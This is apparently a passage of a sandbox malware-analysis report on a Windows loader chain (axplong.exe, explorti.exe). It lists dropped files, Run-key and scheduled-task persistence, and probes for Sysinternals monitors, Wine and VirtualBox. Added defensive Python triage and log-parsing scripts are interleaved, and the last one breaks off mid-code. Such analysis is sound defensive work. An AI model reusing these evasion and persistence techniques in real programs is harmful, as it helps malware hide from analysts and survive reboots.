Source: random[1].exe.0.dr Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: entropy: 7.978158442993088
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: enter[1].exe.0.dr Static PE information: section name: entropy: 7.983026486073879
Source: enter[1].exe.0.dr Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: entropy: 7.983026486073879
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: axplong.exe.5.dr Static PE information: section name: entropy: 7.978158442993088
Source: axplong.exe.5.dr Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: explorti.exe.8.dr Static PE information: section name: entropy: 7.983026486073879
Source: explorti.exe.8.dr Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: random[1].exe.19.dr Static PE information: section name: .text entropy: 7.816119789832956
Source: 48f0ec6733.exe.19.dr Static PE information: section name: .text entropy: 7.816119789832956
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\enter[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\1000003002\ee7a49fbf0.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
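The static PE lines above are the on-disk artifacts a triage script can reproduce without running the sample: blank and random section names, sections mapped writable and executable, per-section entropy near 8, an entry point in .taggant rather than .text, and a header checksum that is either unset (0x0) or, more tellingly, non-zero but wrong (0x1d3ae7 where the file computes to 0x1d959a), which means the file was modified after linking. The "vs" lines, where a section is ER on disk but EW in the memory dump, are only visible dynamically and are not covered here. The script below is an added example and not part of the report or its tooling; it uses only the Python standard library (no pefile), parses the section table, computes entropy, locates the entry point's section and recomputes OptionalHeader.CheckSum the way CheckSumMappedFile does. It runs against a PE constructed inline that imitates the layout of the dropped loaders; the sample layout, the KNOWN_SECTIONS allow-list, the 7.5 entropy threshold and all function names are assumptions for illustration.

```python
"""Static PE triage: section names, EW rights, per-section entropy, entry-point section and
header checksum. Added example, standard library only (no pefile)."""
import hashlib, math, struct
from collections import Counter, namedtuple

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000
KNOWN_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata", ".pdata", ".tls", ".bss", ".CRT", ".didat", ".00cfg"}  # assumed allow-list
PACKED_ENTROPY = 7.5  # bits/byte, assumed threshold; the report's packed sections score 7.8-7.98
Section = namedtuple("Section", "name vaddr vsize raw_off raw_size flags")
PEInfo = namedtuple("PEInfo", "sections entry_rva header_checksum checksum_off")

def parse_pe(data):
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsects = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                     # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum_off = opt + 64                 # OptionalHeader.CheckSum, same offset for PE32 and PE32+
    sections = []
    for i in range(nsects):
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, vaddr, raw_size, raw_off = struct.unpack_from("<IIII", data, off + 8)
        sections.append(Section(name, vaddr, vsize, raw_off, raw_size, struct.unpack_from("<I", data, off + 36)[0]))
    return PEInfo(sections, entry_rva, struct.unpack_from("<I", data, checksum_off)[0], checksum_off)

def pe_checksum(data, checksum_off):
    """CheckSumMappedFile's algorithm: ones'-complement sum of all 32-bit words except the CheckSum field, folded to 16 bits, plus file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off != checksum_off:
            total += struct.unpack_from("<I", padded, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return (((total + (total >> 16)) & 0xFFFF) + len(data)) & 0xFFFFFFFF

def set_checksum(data, value):
    """Copy of data with OptionalHeader.CheckSum overwritten (what link /RELEASE does)."""
    out = bytearray(data)
    struct.pack_into("<I", out, parse_pe(data).checksum_off, value)
    return bytes(out)

def shannon_entropy(buf):
    """Bits per byte: 0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def triage(data):
    """Findings mirroring the report's static PE signatures."""
    info, findings = parse_pe(data), []
    calc = pe_checksum(data, info.checksum_off)
    if info.header_checksum == 0:
        findings.append(f"checksum unset (0x0), computed 0x{calc:x}: usual for user-mode builds, weak on its own")
    elif info.header_checksum != calc:
        findings.append(f"checksum mismatch: header 0x{info.header_checksum:x}, computed 0x{calc:x} (modified after link)")
    for s in info.sections:
        ent = shannon_entropy(data[s.raw_off:s.raw_off + s.raw_size])
        if not s.name or any(not 0x20 <= ord(c) <= 0x7E for c in s.name):
            findings.append(f"section {s.name!r}: empty or non-printable name")
        elif s.name not in KNOWN_SECTIONS:
            findings.append(f"section {s.name!r}: unusual name")
        if s.flags & IMAGE_SCN_MEM_EXECUTE and s.flags & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {s.name!r}: writable and executable (EW)")
        if ent > PACKED_ENTROPY:
            findings.append(f"section {s.name!r}: entropy {ent:.2f}, likely packed or encrypted")
        if s.vaddr <= info.entry_rva < s.vaddr + max(s.vsize, s.raw_size) and s.name != ".text":
            findings.append(f"entry point 0x{info.entry_rva:x} lies in section {s.name!r}, not .text")
    return findings

def build_sample_pe():
    """Constructed 32-bit PE for the demo (not one of the report's samples): low-entropy .text, an EW section
    with a non-printable name full of pseudo-random bytes, an EW '.taggant' section holding the entry point, CheckSum 0."""
    junk = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # 4096 deterministic bytes
    layout = [  # (name, virtual address, raw offset, body, characteristics)
        (b".text", 0x1000, 0x200, b"\x90" * 0x1F0 + b"\xC3" * 0x10, 0x60000020),
        (b"\x01\x02\x03\x04", 0x2000, 0x400, junk, 0xE0000020),
        (b".taggant", 0x3000, 0x1400, b"\xCC" * 0x200, 0xE0000020),
    ]
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, 0x200, 0x1400, 0, 0x3010, 0x1000, 0x2000,   # ..., AddressOfEntryPoint = 0x3010
                      0x400000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0,
                      0, 0x4000, 0x200, 0, 2, 0x8140,                          # SizeOfImage, SizeOfHeaders, CheckSum = 0
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128  # 16 empty data directories
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, len(b), va, len(b), ro, 0, 0, 0, 0, fl) for n, va, ro, b, fl in layout)
    image = bytearray((dos + b"PE\0\0" + coff + opt + hdrs).ljust(0x1600, b"\0"))
    for _, _, ro, body, _ in layout:
        image[ro:ro + len(body)] = body
    return bytes(image)
```

Run `triage(open(path, "rb").read())` on a dropped file to get the same kind of findings the report lists. A checksum of 0x0 is normal for user-mode executables linked without /RELEASE and is only weak evidence on its own; a non-zero checksum that does not verify is the stronger signal, since it means the bytes changed after the linker wrote the header.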

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
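The Boot Survival lines above mix four things a responder wants separated per process: HKCU Run values written by explorti.exe, the legacy C:\Windows\Tasks\axplong.job created by RoamingCBFCFBFBFB.exe, repeated FindWindow probes for the Sysinternals monitor window classes (FilemonClass, RegmonClass, PROCMON_WINDOW_CLASS), and benign noise such as chrome.exe writing Start Menu .lnk files. Note that the report's Run-key lines carry only the value name, not the value data, so the "points to a suspicious folder" judgement of the Sigma rule cannot be reproduced from these lines; what can be keyed on is the location of the process doing the writing. The script below is an added example, not the sandbox's own logic: it parses lines in the report's "Source: <process> <event>: <detail>" shape into per-process counters and ranks processes that both install persistence and probe for analysis tools. It also handles the registry-key probes (Software\Wine, HARDWARE\ACPI\DSDT\VBOX__) listed under Malware Analysis System Evasion further down. The sample lines are copied from the report text; the rule sets, scoring and function names are assumptions.

```python
"""Collapse sandbox behaviour lines into a per-process summary of persistence and
anti-analysis activity. Added example; sample lines copied from the report text,
rule sets and scoring are assumptions."""
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?) "
    r"(?P<event>Registry value created or modified|File created|File opened|Window searched): "
    r"(?P<detail>.*?)(?: Jump to (?:behavior|dropped file))?$"
)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)? ", re.I)
JOB_RE = re.compile(r"^C:\\Windows\\Tasks\\[^\\]+\.job$", re.I)          # legacy AT-style job files
USER_WRITABLE_RE = re.compile(r"^C:\\(?:Users|ProgramData)\\", re.I)
# Window classes of the Sysinternals monitors, spelled as they appear in the report (matched case-insensitively).
ANALYSIS_WINDOWS = {"procmon_window_class", "filemonclass", "regmonclass"}
# Registry keys whose existence alone betrays a VM or Wine.
VM_PROBES = {"software\\wine": "Wine", "hardware\\acpi\\dsdt\\vbox__": "VirtualBox"}

# Constructed input: lines copied from the report above, including two that must not be flagged.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS",
    r"Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass",
    r"Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior",
    r"Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior",
    r"Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk",
    r"Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior",
]


def parse_line(line):
    """Split 'Source: <process> <event>: <detail> [Jump to ...]' into its parts, or None for other events."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def summarize(lines):
    """Per-process counters for persistence, anti_analysis and dropped files; processes with
    nothing of interest (chrome.exe writing .lnk files, WerFault) are left out."""
    report = defaultdict(lambda: {"persistence": Counter(), "anti_analysis": Counter(), "dropped": Counter()})
    for line in lines:
        ev = parse_line(line)
        if not ev:
            continue
        entry, event, detail = report[ev["proc"]], ev["event"], ev["detail"]
        if event == "Registry value created or modified" and RUN_KEY_RE.search(detail):
            value = detail.rsplit(" ", 1)[-1]            # the report shows the value name only
            entry["persistence"][f"Run value {value!r}"] += 1
        elif event == "File created" and JOB_RE.match(detail):
            entry["persistence"][f"scheduled task job {detail}"] += 1
        elif event == "File created" and "Jump to dropped file" in line and USER_WRITABLE_RE.match(detail):
            entry["dropped"][detail] += 1
        elif event == "Window searched":
            name = detail.split("window name: ", 1)[-1]
            if name.lower() in ANALYSIS_WINDOWS:
                entry["anti_analysis"][f"FindWindow probe for {name}"] += 1
        elif event == "File opened":
            for key, product in VM_PROBES.items():
                if key in detail.lower():
                    entry["anti_analysis"][f"{product} registry probe"] += 1
    return {proc: e for proc, e in report.items() if any(e.values())}


def verdict(summary):
    """Rank processes: persistence plus anti-analysis probes in the same binary scores highest;
    a lone category scores too low to be listed."""
    ranked = [(2 * bool(e["persistence"]) + 2 * bool(e["anti_analysis"]) + bool(e["dropped"]), proc)
              for proc, e in summary.items()]
    return sorted(((s, p) for s, p in ranked if s >= 2), reverse=True)
```

Feeding the whole report through `summarize` turns the hundreds of repeated "Window searched" lines into one counter per process and window class, which is the form that is actually useful when writing a detection or an incident timeline.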
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior (5 identical entries collapsed)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (50 identical entries collapsed)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries collapsed)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (50 identical entries collapsed)
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
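The evasion lines in this section come in three shapes: a locale check that ends in ExitProcess (GetUserDefaultLangID, ExitProcess), registry probes for artefacts that only exist under Wine or VirtualBox (HKCU\Software\Wine, HKLM\HARDWARE\ACPI\DSDT\VBOX__), and paired RDTSC reads with junk and branch instructions stuffed between them so that an emulator or single-stepping debugger inflates the measured delta. The following triage script is an added example for this page, not part of the report or of the sandbox vendor's tooling: it parses those three line shapes, groups the indicators per process, measures each RDTSC window (how many instructions sit between the two reads, the byte span, whether branches are present, and whether the span agrees with the two addresses the interceptor reported), and labels the result with ATT&CK technique identifiers. The sample input is a handful of lines copied verbatim from this section (process paths kept exactly as printed); the ATT&CK mapping and the "Jump to behavior" link suffix handling are assumptions made here.

```python
"""Triage helper for the 'Malware Analysis System Evasion' lines of a sandbox report
of this shape. Added example for this page; not the report's or the vendor's code.
Assumes the three line shapes shown in the section (evasive API chain, registry key
opened, RDTSC interceptor) and embeds a few of those lines verbatim as sample input."""
import re
from collections import defaultdict

EVASIVE_CHAIN = re.compile(r"^Source: (?P<proc>\S+) Evasive API call chain: (?P<chain>.+)$")
REG_OPEN = re.compile(r"^Source: (?P<proc>\S+) File opened: (?P<key>\S+)(?: Jump to behavior)?$")
RDTSC = re.compile(
    r"^Source: (?P<proc>\S+) RDTSC instruction interceptor: First address: (?P<a1>[0-9A-Fa-f]+)"
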